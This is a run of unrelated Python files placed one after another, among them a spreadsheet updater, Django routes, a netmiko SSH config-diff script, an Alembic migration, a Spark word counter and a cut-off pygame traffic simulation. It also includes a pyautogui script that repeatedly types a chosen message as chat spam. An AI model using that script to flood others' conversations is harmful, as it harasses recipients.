import gspread # If modifying these scopes, delete the file token.json. SCOPES = ['https://www.googleapis.com/auth/spreadsheets'] CLIENT_SECRET_FILE = '.secrets/PythonSheetsApiSecret.json' CREDENTIALS_TOKEN = '.secrets/token.json' # The ID and range of a sample spreadsheet. SPREADSHEET_ID = '1oc5TC_nGzLXk4sP3zhlyFeYt526cxXXVeDtvMDFWbno' VALUE_RENDER_OPTION = 'FORMULA' VALUE_INPUT_OPTION = 'RAW' stats_starting_row = 4 stylte_stats_sheet = 'StyleStats' style_stats_range = 'B4:T' style_final_str_column = 'StyleStats!M4:M' style_final_end_column = 'StyleStats!N4:N' style_final_dex_column = 'StyleStats!O4:O' style_final_agi_column = 'StyleStats!P4:P' style_final_int_column = 'StyleStats!Q4:Q' style_final_wil_column = 'StyleStats!R4:R' style_final_lov_column = 'StyleStats!S4:S' style_final_cha_column = 'StyleStats!T4:T' class Character: rows = [] name = '' def login(): return gspread.oauth(credentials_filename=CLIENT_SECRET_FILE, authorized_user_filename=CREDENTIALS_TOKEN) def get_styles(auth): style_sheet = auth.open_by_key(SPREADSHEET_ID) styles = style_sheet.worksheet(stylte_stats_sheet).get(style_stats_range, value_render_option=VALUE_RENDER_OPTION) characters = {} for i, s in enumerate(styles): if s[0] not in characters: characters[s[0]] = [i + stats_starting_row] else: characters[s[0]].append(i + stats_starting_row) return characters def update_sheet(auth, characters): style_sheet = auth.open_by_key(SPREADSHEET_ID) style_data_sheet = style_sheet.worksheet(stylte_stats_sheet) style_data_sheet.update('A1', 'Testing') if __name__ == '__main__': update_sheet(login(), '')
1,695
660
import json as j # CONVERTING TO JSON data = { "Name": "John Doe", "Age": "22" } y = j.dumps(data) print(y) # A LIST IS CONVERTED INTO JSON EQUIVALENT ARRAY data = [1, 2, 3, 4, 5] i = j.dumps(data) print(i) # READING FROM JSON x = '{ "name":"John", "age":30, "city":"New York"}' y = j.loads(x) print(y) print(y["age"])
350
170
from django.urls import path from programdom.problems.views import ProblemStudentView, ProblemListView, ProblemDetailView, ProblemDeleteView, \ ProblemCreateView, ProblemTestcaseCreateView, ProblemTestCaseUpdateView, ProblemTestCaseDeleteView urlpatterns = [ path("", ProblemListView.as_view(), name="problem_list"), path("new/", ProblemCreateView.as_view(), name="problem_create"), path("<int:pk>/", ProblemDetailView.as_view(), name="problem_detail"), path("<int:pk>/delete/", ProblemDeleteView.as_view(), name="problem_delete"), path("<int:pk>/student/", ProblemStudentView.as_view(), name="problem_student"), path("<int:pk>/tests/new/", ProblemTestcaseCreateView.as_view(), name="problem_test_new"), path("<int:pk>/tests/<int:tc_pk>/", ProblemTestCaseUpdateView.as_view(), name="problem_test_update"), path("<int:pk>/tests/<int:tc_pk>/delete/", ProblemTestCaseDeleteView.as_view(), name="problem_test_delete"), ]
958
287
from getpass import getpass import netmiko import re import difflib def make_connection (ip, username, password): return netmiko.ConnectHandler(device_type='cisco_ios', ip=ip, username=username, password=password) def get_ip (input): return(re.findall(r'(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)', input)) def get_ips (file_name): for line in open(file_name, 'r').readlines(): line = get_ip(line) for ip in line: ips.append(ip) def to_doc_a(file_name, varable): f=open(file_name, 'a') f.write(varable) f.write('\n') f.close() def to_doc_w(file_name, varable): f=open(file_name, 'w') f.write(varable) f.close() #This will be a list of the devices we want to SSH to ips = [] #Pull the IPs.txt is a list of the IPs we want to connect to #This function pulls those IPs out of the txt file and puts them into a list get_ips("input/IPs.txt") print('#' * 50) print('#' * 50, '\n HOSTS', ips, '\n', " Make sure you have checked your individual command files", '\n') print("IF INCORRECT QUIT NOW CTRL^C ", '\n', '#' * 50) print('#' * 50) #Prompt user for account info username = input("Username: ") password = getpass() #This is required for our Diff Loop, pre-tvt store in Before, Post in After file_name_input = input("For Pre-TVT type Before.txt - For Post-TVT type After.txt : ") #For each IP in our IPs.txt file, we will look for that IP.txt for the individual commands for the host for ip in ips: #Connect to a device file_name_tup = ("output/" + ip, "-" + file_name_input ) file_name = ''.join(file_name_tup) to_doc_w(file_name, "") commands_list = [] # Get the commands from unique ipaddress.txt and append to our list with open("input/" + ip + '.txt', 'r') as f: for line in f: commands_list.append(line) try: net_connect = make_connection(ip , username, password) print("Completing " + ip ) #Run all our commands and append to our file_name for commands in commands_list: output = net_connect.send_command_timing(commands) results = output + '\n' #Next we will append the output to the individual results file to_doc_a(file_name, results) except: print( ip + " Failed to connect") #Loop to determine actions for Pre-TVT or Post-TVT #Before Just prints complete if "Before" in file_name: print('Completed') #After will run the diff comparing before and after elif "After" in file_name: for ip in ips: file_name_before = ("output/" + ip, "-" + "Before.txt" ) file_name_after = ("output/" + ip, "-" + "After.txt" ) fromfile = ''.join(file_name_before) tofile = ''.join(file_name_after) fromlines = open(fromfile, 'U').readlines() tolines = open(tofile, 'U').readlines() diff = difflib.HtmlDiff().make_file(fromlines,tolines,fromfile,tofile) f = open("output/" + ip + "-changes.html", "w") f.write(diff) f.close print("Open output/" + ip + "-changes.html to see difference") #If there was something other than before.txt or after.txt else: print('Before or After not detected')
3,023
1,138
name = "pyiArduinoI2Cmotor"
28
15
from __future__ import absolute_import, division, print_function, unicode_literals from echomesh.util.registry.Module import register from echomesh.output.OutputCache import OutputCache REGISTRY = register( __name__, 'Bidirectional', 'Offset', 'Output', 'Map', 'Spi', 'Test', 'Visualizer', ) OUTPUT_CACHE = OutputCache() def make_output(data): if isinstance(data, dict): return REGISTRY.make_from_description(data, default_type='output') else: return OUTPUT_CACHE.get_output(data) def pause_outputs(): from echomesh.output.Output import pause_outputs pause_outputs()
620
212
from selenium import webdriver #Browser control with options/waits/exceptions. from selenium.webdriver.common.keys import Keys from selenium.webdriver.chrome.options import Options from bs4 import BeautifulSoup import json def main(): opts = Options() opts.add_argument('--headless') opts.add_argument('--disable-gpu') opts.add_argument('window-size=1000,1000') driver = webdriver.Chrome(options=opts) #print "Getting info for username " + username driver.get("http://lintulahti.pihka.fi/") html_source = driver.page_source.encode("utf-8") soup = BeautifulSoup(html_source, 'html.parser') menu = dict() day_elems = soup.findAll('div', { "class": ["menu-day"] }) for elem in day_elems: day = elem.find('h3') day = unicode(day.span.string).strip() foods = elem.findAll('li') foodarray = [] for food in foods: foodarray.append( unicode(food.span.string).strip() ) #print "" # Empty line menu[day] = foodarray driver.close() return menu def asString(): menu = main() response = "" for key in menu: response += key + "\n" foods = menu[key] for food in foods: response += food + "\n" response += "\n" return response if __name__ == '__main__': print asString()
1,221
454
# Ler dois valores (considere que não serão lidos valores iguais) e escrever o maior deles. n1 = float(input('Numero 1:')) n2 = float(input('Numero 2: ')) if n1 > n2: print(n1) else: print(n2)
203
89
from RFEM.initModel import ConvertToDlString, Model, clearAtributes class MemberResultIntermediatePoint(): def __init__(self, no: int = 1, members: str = "", point_count: int = 2, uniform_distribution: bool = True, distances = None, comment: str = '', params: dict = None, model = Model): """ Args: no (int): Member Result Intermediate Point Tag members (str): Assigned Members point_count (int): Assigned Point Number uniform_distribution (bool): Uniform Distrubition Option distances (list): Distances Table comment (str, optional): Comment params (dict, optional): Parameters """ # Client model | Member Result Intermediate Point clientObject = model.clientModel.factory.create('ns0:member_result_intermediate_point') # Clears object atributes | Sets all atributes to None clearAtributes(clientObject) # Member Result Intermediate Point No. clientObject.no = no # Assigned Members clientObject.members = ConvertToDlString(members) # Point Count clientObject.uniform_distribution = uniform_distribution if uniform_distribution: clientObject.point_count = point_count else: clientObject.distances = Model.clientModel.factory.create('ns0:member_result_intermediate_point.distances') for i,j in enumerate(distances): mlvlp = Model.clientModel.factory.create('ns0:member_result_intermediate_point_distances') mlvlp.no = i+1 mlvlp.value = distances[i][0] mlvlp.note = None clientObject.distances.member_result_intermediate_point_distances.append(mlvlp) # Comment clientObject.comment = comment # Adding optional parameters via dictionary if params: for key in params: clientObject[key] = params[key] # Add Member Result Intermediate Point to client model model.clientModel.service.set_member_result_intermediate_point(clientObject)
2,277
560
"""Initial schema Revision ID: bdeeeacbec4d Revises: Create Date: 2020-04-11 11:20:18.814141 """ import json from alembic import op import sqlalchemy as sa from sqlalchemy.dialects import postgresql # revision identifiers, used by Alembic. revision = 'bdeeeacbec4d' down_revision = None branch_labels = None depends_on = None DEFAULT_NOTIFICATIONS = { 'innostore': 'off', 'volunteering': 'off', 'project_creation': 'off', 'administration': 'off', 'service': 'email', } def upgrade(): # ### commands auto generated by Alembic - please adjust! ### op.create_table('accounts', sa.Column('full_name', sa.String(length=256), nullable=False), sa.Column('group', sa.String(length=64), nullable=True), sa.Column('email', sa.String(length=128), nullable=False), sa.Column('telegram_username', sa.String(length=32), nullable=True), sa.Column('is_admin', sa.Boolean(), nullable=False), sa.Column('notification_settings', postgresql.JSONB(astext_type=sa.Text()), nullable=False, server_default=json.dumps(DEFAULT_NOTIFICATIONS)), sa.PrimaryKeyConstraint('email') ) op.create_table('colors', sa.Column('value', sa.String(length=6), nullable=False), sa.PrimaryKeyConstraint('value') ) op.create_table('competences', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=128), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('products', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=128), nullable=False), sa.Column('type', sa.String(length=128), nullable=True), sa.Column('description', sa.String(length=1024), nullable=False), sa.Column('price', sa.Integer(), nullable=False), sa.Column('addition_time', sa.DateTime(timezone=True), nullable=False), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name', 'type', name='unique product') ) op.create_table('sizes', sa.Column('value', sa.String(length=3), nullable=False), sa.PrimaryKeyConstraint('value') ) op.create_table('notifications', sa.Column('id', sa.Integer(), nullable=False), sa.Column('recipient_email', sa.String(length=128), nullable=False), sa.Column('is_read', sa.Boolean(), nullable=False), sa.Column('payload', postgresql.JSONB(astext_type=sa.Text()), nullable=True), sa.Column('timestamp', sa.DateTime(timezone=True), nullable=False), sa.Column('type', sa.Enum('purchase_status_changed', 'new_arrivals', 'claim_innopoints', 'application_status_changed', 'service', 'manual_transaction', 'project_review_status_changed', 'all_feedback_in', 'added_as_moderator', 'out_of_stock', 'new_purchase', 'project_review_requested', name='notificationtype'), nullable=False), sa.ForeignKeyConstraint(['recipient_email'], ['accounts.email'], ), sa.PrimaryKeyConstraint('id') ) op.create_table('static_files', sa.Column('id', sa.Integer(), nullable=False), sa.Column('mimetype', sa.String(length=255), nullable=False), sa.Column('owner_email', sa.String(length=128), nullable=False), sa.ForeignKeyConstraint(['owner_email'], ['accounts.email'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id') ) op.create_table('varieties', sa.Column('id', sa.Integer(), nullable=False), sa.Column('product_id', sa.Integer(), nullable=False), sa.Column('size', sa.String(length=3), nullable=True), sa.Column('color', sa.String(length=6), nullable=True), sa.ForeignKeyConstraint(['color'], ['colors.value'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['product_id'], ['products.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['size'], ['sizes.value'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id') ) op.create_table('product_images', sa.Column('id', sa.Integer(), nullable=False), sa.Column('variety_id', sa.Integer(), nullable=False), sa.Column('image_id', sa.Integer(), nullable=False), sa.Column('order', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('variety_id', 'order', deferrable='True', initially='DEFERRED', name='unique order indices') ) op.create_table('projects', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=128), nullable=False), sa.Column('image_id', sa.Integer(), nullable=True), sa.Column('creation_time', sa.DateTime(timezone=True), nullable=False), sa.Column('organizer', sa.String(length=128), nullable=True), sa.Column('creator_email', sa.String(length=128), nullable=False), sa.Column('admin_feedback', sa.String(length=1024), nullable=True), sa.Column('review_status', sa.Enum('pending', 'approved', 'rejected', name='reviewstatus'), nullable=True), sa.Column('lifetime_stage', sa.Enum('draft', 'ongoing', 'finalizing', 'finished', name='lifetimestage'), nullable=False), sa.ForeignKeyConstraint(['creator_email'], ['accounts.email'], ), sa.ForeignKeyConstraint(['image_id'], ['static_files.id'], ), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name') ) op.create_table('stock_changes', sa.Column('id', sa.Integer(), nullable=False), sa.Column('amount', sa.Integer(), nullable=False), sa.Column('time', sa.DateTime(timezone=True), nullable=False), sa.Column('status', sa.Enum('carried_out', 'pending', 'ready_for_pickup', 'rejected', name='stockchangestatus'), nullable=False), sa.Column('account_email', sa.String(length=128), nullable=False), sa.Column('variety_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['variety_id'], ['varieties.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id') ) op.create_table('activities', sa.Column('id', sa.Integer(), nullable=False), sa.Column('name', sa.String(length=128), nullable=True), sa.Column('description', sa.String(length=1024), nullable=True), sa.Column('start_date', sa.DateTime(timezone=True), nullable=True), sa.Column('end_date', sa.DateTime(timezone=True), nullable=True), sa.Column('project_id', sa.Integer(), nullable=False), sa.Column('working_hours', sa.Integer(), nullable=False), sa.Column('reward_rate', sa.Integer(), nullable=False), sa.Column('fixed_reward', sa.Boolean(), nullable=False), sa.Column('people_required', sa.Integer(), nullable=False), sa.Column('telegram_required', sa.Boolean(), nullable=False), sa.Column('application_deadline', sa.DateTime(timezone=True), nullable=True), sa.Column('feedback_questions', sa.ARRAY(sa.String(length=1024)), nullable=False), sa.Column('internal', sa.Boolean(), nullable=False, server_default='False'), sa.CheckConstraint('(fixed_reward AND working_hours = 1) OR (NOT fixed_reward AND reward_rate = 70)', name='reward policy'), sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('name', 'project_id', name='name is unique inside a project') ) op.create_table('project_files', sa.Column('project_id', sa.Integer(), nullable=False), sa.Column('file_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['file_id'], ['static_files.id'], ), sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ), sa.PrimaryKeyConstraint('project_id', 'file_id') ) op.create_table('project_moderation', sa.Column('project_id', sa.Integer(), nullable=False), sa.Column('account_email', sa.String(length=128), nullable=False), sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], onupdate='CASCADE', ondelete='CASCADE'), sa.ForeignKeyConstraint(['project_id'], ['projects.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('project_id', 'account_email') ) op.create_table('activity_competence', sa.Column('activity_id', sa.Integer(), nullable=False), sa.Column('competence_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('activity_id', 'competence_id') ) op.create_table('applications', sa.Column('id', sa.Integer(), nullable=False), sa.Column('applicant_email', sa.String(length=128), nullable=False), sa.Column('activity_id', sa.Integer(), nullable=False), sa.Column('comment', sa.String(length=1024), nullable=True), sa.Column('application_time', sa.DateTime(timezone=True), nullable=False), sa.Column('telegram_username', sa.String(length=32), nullable=True), sa.Column('status', sa.Enum('approved', 'pending', 'rejected', name='applicationstatus'), nullable=False), sa.Column('actual_hours', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['activity_id'], ['activities.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['applicant_email'], ['accounts.email'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('id'), sa.UniqueConstraint('applicant_email', 'activity_id', name='only one application') ) op.create_table('feedback', sa.Column('application_id', sa.Integer(), nullable=False), sa.Column('time', sa.DateTime(timezone=True), nullable=False), sa.Column('answers', sa.ARRAY(sa.String(length=1024)), nullable=False), sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('application_id'), sa.UniqueConstraint('application_id') ) op.create_table('reports', sa.Column('application_id', sa.Integer(), nullable=False), sa.Column('reporter_email', sa.String(length=128), nullable=False), sa.Column('time', sa.DateTime(timezone=True), nullable=False), sa.Column('rating', sa.Integer(), nullable=False), sa.Column('content', sa.String(length=1024), nullable=True), sa.ForeignKeyConstraint(['application_id'], ['applications.id'], ), sa.ForeignKeyConstraint(['reporter_email'], ['accounts.email'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('application_id', 'reporter_email') ) op.create_table('feedback_competence', sa.Column('feedback_id', sa.Integer(), nullable=False), sa.Column('competence_id', sa.Integer(), nullable=False), sa.ForeignKeyConstraint(['competence_id'], ['competences.id'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='CASCADE'), sa.PrimaryKeyConstraint('feedback_id', 'competence_id') ) op.create_table('transactions', sa.Column('id', sa.Integer(), nullable=False), sa.Column('account_email', sa.String(length=128), nullable=False), sa.Column('change', sa.Integer(), nullable=False), sa.Column('stock_change_id', sa.Integer(), nullable=True), sa.Column('feedback_id', sa.Integer(), nullable=True), sa.CheckConstraint('(stock_change_id IS NULL) OR (feedback_id IS NULL)', name='not(feedback and stock_change)'), sa.ForeignKeyConstraint(['account_email'], ['accounts.email'], ondelete='CASCADE'), sa.ForeignKeyConstraint(['feedback_id'], ['feedback.application_id'], ondelete='SET NULL'), sa.ForeignKeyConstraint(['stock_change_id'], ['stock_changes.id'], ondelete='SET NULL'), sa.PrimaryKeyConstraint('id') ) # ### end Alembic commands ### def downgrade(): # ### commands auto generated by Alembic - please adjust! ### op.drop_table('transactions') op.drop_table('feedback_competence') op.drop_table('reports') op.drop_table('feedback') op.drop_table('applications') op.drop_table('activity_competence') op.drop_table('project_moderation') op.drop_table('project_files') op.drop_table('activities') op.drop_table('stock_changes') op.drop_table('projects') op.drop_table('product_images') op.drop_table('varieties') op.drop_table('static_files') op.drop_table('notifications') op.drop_table('sizes') op.drop_table('products') op.drop_table('competences') op.drop_table('colors') op.drop_table('accounts') # ### end Alembic commands ###
12,433
4,095
import numpy as np from ._CFunctions import _CDayNotoDate from ._CTConv import _CTConv def DayNotoDate(Year,Doy): ''' Converts year and day numbers to a date of the format yyyymmdd. Inputs ====== Year : int32 Array or scalar of years Doy : int32 Array or scalar of day numbers Returns ======= Date : int Array or scalar of dates ''' #convert the inputs into the exact dtypes required for C++ _n = _CTConv(np.size(Doy),'c_int') _Year = _CTConv(Year,'c_int_ptr') _Doy = _CTConv(Doy,'c_int_ptr') _Date = np.zeros(_n,dtype='int32') #call the C++ function _CDayNotoDate(_n,_Year,_Doy,_Date) return _Date
636
273
########################################################################################## ########################################################################################## # BigData - Application # ########################################################################################## ########################################################################################## ########################################################################################## # import libraries # ########################################################################################## import findspark findspark.init() from pyspark.sql import SparkSession import happybase from nltk.corpus import stopwords import nltk import pandas as pd import pymongo import sys nltk.download("stopwords") import time ########################################################################################## # init spark # ########################################################################################## spark=SparkSession.builder\ .master("local[*]")\ .appName("application")\ .getOrCreate() sc=spark.sparkContext ########################################################################################## # prerequisites # ########################################################################################## # delete umlauts def umlauts(word): tempVar = word tempVar = tempVar.replace('ä', 'ae') tempVar = tempVar.replace('ö', 'oe') tempVar = tempVar.replace('ü', 'ue') tempVar = tempVar.replace('Ä', 'Ae') tempVar = tempVar.replace('Ö', 'Oe') tempVar = tempVar.replace('Ü', 'Ue') tempVar = tempVar.replace('ß', 'ss') return tempVar # exclude punctuation def lower_clean_str(x): punc='!"#$%&\'()*+,./:;<=>?@[\\]^_`{|}~-„“' lowercased_str = x.lower() for ch in punc: lowercased_str = lowercased_str.replace(ch, ' ') return lowercased_str ########################################################################################## # Application # ########################################################################################## def application(news): # create Pipelined RDD df = sc.parallelize(news) # remove punktuation and transform to lowercase df = df.map(lower_clean_str) #split sentences into list of words df = df.flatMap(lambda satir: satir.split(" ")) # exclude whitespaces df = df.filter(lambda x:x!='') # count how many times each word occurs count = df.map(lambda word:(word,1)) countRBK = count.reduceByKey(lambda x,y:(x+y)).sortByKey() # rank words countRBK = countRBK.map(lambda x:(x[1],x[0])) countRBK = countRBK.sortByKey(False) # get german stopwords and change their umlauts stops =stopwords.words('german') german_stopwords = [] for word in stops: german_stopwords.append(umlauts(word)) # delete stopwords countRBK = countRBK.filter(lambda x: x[1] not in german_stopwords) # write result into pandas dataframe and export export = pd.DataFrame(columns=['trend-word']) for i in range(5): export = export.append({'trend-word': countRBK.take(5)[i][1]}, ignore_index=True) return export ########################################################################################## # attaching database # ########################################################################################## def data_from_datalake(): connection = happybase.Connection(host='lake-connection', port=9090, autoconnect=True) table = connection.table('crawled_articles') news = [] for k, data in table.scan(): news.append(data[b'data:title'].decode('utf-8')) connection.close() return news ########################################################################################## # Run Application with Data # ########################################################################################## def write_mongo(result): # Create a MongoDB client print(result) # client = pymongo.MongoClient('mongodb://mongo-container:27017') client = pymongo.MongoClient('mongodb://mongo-connection:27017') # client = pymongo.MongoClient('mongodb://mongo-0.mongo-service') # Specify the database to be used db = client.news # Specify the collectionlection to be used collection = db.newscollection dao_object = {"cat":"all","titles":[]} # Insert a single document for i in range(len(result)): dao_object["titles"].append(result.iloc[i,0]) collection.update_one({"cat":"all"},{"$set": dao_object},upsert=True) # Close the connection client.close() # run whole application write_mongo(application(data_from_datalake())) # time sleep, that the pod gets rebuild after completion time.sleep(500)
4,996
1,354
from .insert_sessions import insert_sessions from .storage_dirs import base_dir, check_env, kachery_storage_dir
112
36
from django.db import models class Experiment(models.Model): INBUILT = 0 PACKAGE = 1 method = models.IntegerField() field_types = models.CharField(max_length=100) fields = models.SmallIntegerField() count = models.IntegerField() batch_size = models.IntegerField() time = models.FloatField()
327
105
import pyautogui, time from time import sleep spamnum = int(input(f"Input Number: ")) spamtext = input(f"What is the Message u want to send?: ") time = 0 while time != 10: time += 1 sleep(1) print("spammer waitinig.." + str(time)) def spam (msg, maxMsg): count = 0 while count != maxMsg: count += 1 print("sendmessage:" + str(count)) pyautogui.write(msg) pyautogui.press("enter") if count == spamnum or count == spamnum*2 or count == spamnum*3 or count == spamnum*4 or count == spamnum*spamnum or count == spamnum*6 or count == spamnum*7 or count == spamnum*8 or count == spamnum*9 or count == spamnum*20: sleep(5) spam(spamtext, spamnum) sleep(2) pyautogui.write("done") pyautogui.press("enter")
751
319
import random import time import threading import pygame import sys # Default values of signal timers defaultGreen = {0: 10, 1: 10, 2: 10, 3: 10} defaultRed = 150 defaultYellow = 5 signals = [] noOfSignals = 4 currentGreen = 0 # Indicates which signal is green currently nextGreen = (currentGreen + 1) % noOfSignals # Indicates which signal will turn green next currentYellow = 0 # Indicates whether yellow signal is on or off speeds = {'car': 2.25, 'bus': 1.8, 'truck': 1.8, 'bike': 2.5} # average speeds of vehicles # Coordinates of vehicles' start x = {'right': [0, 0, 0], 'down': [755, 727, 697], 'left': [1400, 1400, 1400], 'up': [602, 627, 657]} y = {'right': [348, 370, 398], 'down': [0, 0, 0], 'left': [498, 466, 436], 'up': [800, 800, 800]} vehicles = {'right': {0: [], 1: [], 2: [], 'crossed': 0}, 'down': {0: [], 1: [], 2: [], 'crossed': 0}, 'left': {0: [], 1: [], 2: [], 'crossed': 0}, 'up': {0: [], 1: [], 2: [], 'crossed': 0}} vehicleTypes = {0: 'car', 1: 'bus', 2: 'truck', 3: 'bike'} directionNumbers = {0: 'right', 1: 'down', 2: 'left', 3: 'up'} # Coordinates of signal image, timer, and vehicle count signalCoods = [(530, 230), (810, 230), (810, 570), (530, 570)] signalTimerCoods = [(530, 210), (810, 210), (810, 550), (530, 550)] # Coordinates of stop lines stopLines = {'right': 590, 'down': 330, 'left': 800, 'up': 535} defaultStop = {'right': 580, 'down': 320, 'left': 810, 'up': 545} # stops = {'right': [580,580,580], 'down': [320,320,320], 'left': [810,810,810], 'up': [545,545,545]} # Gap between vehicles stoppingGap = 15 # stopping gap movingGap = 15 # moving gap pygame.init() simulation = pygame.sprite.Group() class TrafficSignal: def __init__(self, red, yellow, green): self.red = red self.yellow = yellow self.green = green self.signalText = "" class Vehicle(pygame.sprite.Sprite): def __init__(self, lane, vehicleClass, direction_number, direction): pygame.sprite.Sprite.__init__(self) self.lane = lane self.vehicleClass = vehicleClass self.speed = speeds[vehicleClass] self.direction_number = direction_number self.direction = direction self.x = x[direction][lane] self.y = y[direction][lane] self.crossed = 0 vehicles[direction][lane].append(self) self.index = len(vehicles[direction][lane]) - 1 path = "images/" + direction + "/" + vehicleClass + ".png" self.image = pygame.image.load(path) if (len(vehicles[direction][lane]) > 1 and vehicles[direction][lane][ self.index - 1].crossed == 0): # if more than 1 vehicle in the lane of vehicle before it has crossed stop line if (direction == 'right'): self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][ self.index - 1].image.get_rect().width - stoppingGap # setting stop coordinate as: stop coordinate of next vehicle - width of next vehicle - gap elif (direction == 'left'): self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][ self.index - 1].image.get_rect().width + stoppingGap elif (direction == 'down'): self.stop = vehicles[direction][lane][self.index - 1].stop - vehicles[direction][lane][ self.index - 1].image.get_rect().height - stoppingGap elif (direction == 'up'): self.stop = vehicles[direction][lane][self.index - 1].stop + vehicles[direction][lane][ self.index - 1].image.get_rect().height + stoppingGap else: self.stop = defaultStop[direction] # Set new starting and stopping coordinate if (direction == 'right'): temp = self.image.get_rect().width + stoppingGap x[direction][lane] -= temp elif (direction == 'left'): temp = self.image.get_rect().width + stoppingGap x[direction][lane] += temp elif (direction == 'down'): temp = self.image.get_rect().height + stoppingGap y[direction][lane] -= temp elif (direction == 'up'): temp = self.image.get_rect().height + stoppingGap y[direction][lane] += temp simulation.add(self) def render(self, screen): screen.blit(self.image, (self.x, self.y)) def move(self): if (self.direction == 'right'): if (self.crossed == 0 and self.x + self.image.get_rect().width > stopLines[ self.direction]): # if the image has crossed stop line now self.crossed = 1 if ((self.x + self.image.get_rect().width <= self.stop or self.crossed == 1 or ( currentGreen == 0 and currentYellow == 0)) and ( self.index == 0 or self.x + self.image.get_rect().width < ( vehicles[self.direction][self.lane][self.index - 1].x - movingGap))): # (if the image has not reached its stop coordinate or has crossed stop line or has green signal) and (it is either the first vehicle in that lane or it is has enough gap to the next vehicle in that lane) self.x += self.speed # move the vehicle elif (self.direction == 'down'): if (self.crossed == 0 and self.y + self.image.get_rect().height > stopLines[self.direction]): self.crossed = 1 if ((self.y + self.image.get_rect().height <= self.stop or self.crossed == 1 or ( currentGreen == 1 and currentYellow == 0)) and ( self.index == 0 or self.y + self.image.get_rect().height < ( vehicles[self.direction][self.lane][self.index - 1].y - movingGap))): self.y += self.speed elif (self.direction == 'left'): if (self.crossed == 0 and self.x < stopLines[self.direction]): self.crossed = 1 if ((self.x >= self.stop or self.crossed == 1 or (currentGreen == 2 and currentYellow == 0)) and ( self.index == 0 or self.x > ( vehicles[self.direction][self.lane][self.index - 1].x + vehicles[self.direction][self.lane][ self.index - 1].image.get_rect().width + movingGap))): self.x -= self.speed elif (self.direction == 'up'): if (self.crossed == 0 and self.y < stopLines[self.direction]): self.crossed = 1 if ((self.y >= self.stop or self.crossed == 1 or (currentGreen == 3 and currentYellow == 0)) and ( self.index == 0 or self.y > ( vehicles[self.direction][self.lane][self.index - 1].y + vehicles[self.direction][self.lane][ self.index - 1].image.get_rect().height + movingGap))): self.y -= self.speed # Initialization of signals with default values def initialize(): ts1 = TrafficSignal(0, defaultYellow, defaultGreen[0]) signals.append(ts1) ts2 = TrafficSignal(ts1.red + ts1.yellow + ts1.green, defaultYellow, defaultGreen[1]) signals.append(ts2) ts3 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[2]) signals.append(ts3) ts4 = TrafficSignal(defaultRed, defaultYellow, defaultGreen[3]) signals.append(ts4) repeat() def repeat(): global currentGreen, currentYellow, nextGreen while (signals[currentGreen].green > 0): # while the timer of current green signal is not zero updateValues() time.sleep(1) currentYellow = 1 # set yellow signal on # reset stop coordinates of lanes and vehicles for i in range(0, 3): for vehicle in vehicles[directionNumbers[currentGreen]][i]: vehicle.stop = defaultStop[directionNumbers[currentGreen]] while (signals[currentGreen].yellow > 0): # while the timer of current yellow signal is not zero updateValues() time.sleep(1) currentYellow = 0 # set yellow signal off # reset all signal times of current signal to default times signals[currentGreen].green = defaultGreen[currentGreen] signals[currentGreen].yellow = defaultYellow signals[currentGreen].red = defaultRed currentGreen = nextGreen # set next signal as green signal nextGreen = (currentGreen + 1) % noOfSignals # set next green signal signals[nextGreen].red = signals[currentGreen].yellow + signals[ currentGreen].green # set the red time of next to next signal as (yellow time + green time) of next signal repeat() # Update values of the signal timers after every second def updateValues(): for i in range(0, noOfSignals): if (i == currentGreen): if (currentYellow == 0): signals[i].green -= 1 else: signals[i].yellow -= 1 else: signals[i].red -= 1 # Generating vehicles in the simulation def generateVehicles(): daytime = 360 sleeptime = 0 while (True): lane_number = 2 # original version: random.randint(1,2) cartype = [60, 70, 80, 100] dist = [50, 100] temp1 = random.randint(0, 99) temp2 = random.randint(0, 99) direction_number = 0 if (temp1 < cartype[0]): vehicle_type = 0 elif (temp1 < cartype[1]): vehicle_type = 1 elif (temp1 < cartype[2]): vehicle_type = 2 elif (temp1 < cartype[3]): vehicle_type = 3 if (temp2 < dist[0]): direction_number = 0 elif (temp2 < dist[1]): direction_number = 3 if (daytime < 360): sleeptime = 5 elif (daytime >= 360 and daytime < 480): sleeptime = 2 elif (daytime >= 480 and daytime < 720): sleeptime = 3 elif (daytime >= 720 and daytime < 840): sleeptime = 2 